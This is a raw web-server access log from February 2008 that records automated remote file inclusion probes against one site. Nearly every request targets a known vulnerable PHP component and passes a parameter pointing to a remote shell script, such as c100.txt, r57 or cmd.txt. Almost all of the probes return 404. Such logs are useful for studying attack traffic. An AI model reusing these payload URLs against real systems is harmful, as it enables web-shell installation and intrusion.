211.233.19.105 - - [25/Feb/2008:08:21:51 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.30.216.104 - - [25/Feb/2008:08:21:57 -0800] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:08:22:15 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:08:22:15 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:08:22:15 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:22:35 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:22:36 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:22:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.97.0.11 - - [25/Feb/2008:08:23:28 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
89.97.0.11 - - [25/Feb/2008:08:23:28 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:24:18 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:24:18 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:24:19 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:08:24:22 -0800] "GET /logs/access_080108.log/common.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:08:24:24 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:08:24:24 -0800] "GET /logs/common.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:08:24:24 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:24:48 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:24:48 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:24:49 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:25:12 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:08:25:56 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:08:25:56 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:26:42 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:26:56 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:26:56 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:26:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:26:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:26:57 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:26:57 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:26:59 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:26:59 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:28:08 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:28:08 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:28:09 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:29:01 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:29:02 -0800] "GET //Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:29:02 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:08:29:20 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:08:29:20 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:08:29:21 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [25/Feb/2008:08:29:30 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [25/Feb/2008:08:29:30 -0800] "GET //Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [25/Feb/2008:08:29:30 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.94.179 - - [25/Feb/2008:08:29:35 -0800] "GET /logs///modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:29:54 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:29:54 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:08:30:10 -0800] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:08:30:11 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:30:12 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:30:13 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:30:13 -0800] "GET /logs/access_080103.log/phpsecurityadmin/include/logout.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:30:14 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:30:14 -0800] "GET /phpsecurityadmin/include/logout.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:30:14 -0800] "GET /logs/phpsecurityadmin/include/logout.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
67.19.61.90 - - [25/Feb/2008:08:30:33 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:31:16 -0800] "GET /logs/access.log//main.php?sayfa=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:31:18 -0800] "GET //main.php?sayfa=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:31:19 -0800] "GET /logs//main.php?sayfa=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:31:32 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.169.46 - - [25/Feb/2008:08:32:19 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [25/Feb/2008:08:32:20 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:32:22 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:32:22 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:32:22 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.31.153.35 - - [25/Feb/2008:08:32:22 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:32:22 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:32:23 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:32:28 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:08:33:25 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:08:33:25 -0800] "GET //include.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:08:33:25 -0800] "GET /logs//include.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:33:41 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:33:41 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:33:42 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:08:33:47 -0800] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:08:33:47 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:08:33:47 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.193.127.94 - - [25/Feb/2008:08:34:01 -0800] "GET /logs/access_080118.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.193.127.94 - - [25/Feb/2008:08:34:03 -0800] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:34:41 -0800] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:34:41 -0800] "GET /logs/access_080211.log/xGB.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:34:42 -0800] "GET /logs/xGB.php?act=admin&do=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:34:49 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.117.130.181 - - [25/Feb/2008:08:35:34 -0800] "GET /logs/access_080111.log/scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [25/Feb/2008:08:35:34 -0800] "GET /scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [25/Feb/2008:08:35:35 -0800] "GET /logs/scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.193.127.94 - - [25/Feb/2008:08:35:54 -0800] "GET /logs/access.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.130.181 - - [25/Feb/2008:08:36:15 -0800] "GET /logs/access_080126.log/scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:36:23 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:36:24 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:36:24 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:36:37 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:36:38 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:36:38 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:36:53 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:36:54 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:36:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:36:57 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.200.223 - - [25/Feb/2008:08:37:04 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/tiger/inject/rfi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [25/Feb/2008:08:37:05 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/tiger/inject/rfi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [25/Feb/2008:08:37:05 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/tiger/inject/rfi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:37:12 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:37:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:37:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.183.77.56 - - [25/Feb/2008:08:37:16 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [25/Feb/2008:08:38:45 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [25/Feb/2008:08:38:46 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.200.223 - - [25/Feb/2008:08:39:23 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/tiger/inject/rfi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:39:46 -0800] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:39:47 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:39:48 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:39:51 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.130.181 - - [25/Feb/2008:08:39:53 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [25/Feb/2008:08:39:56 -0800] "GET /logs/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
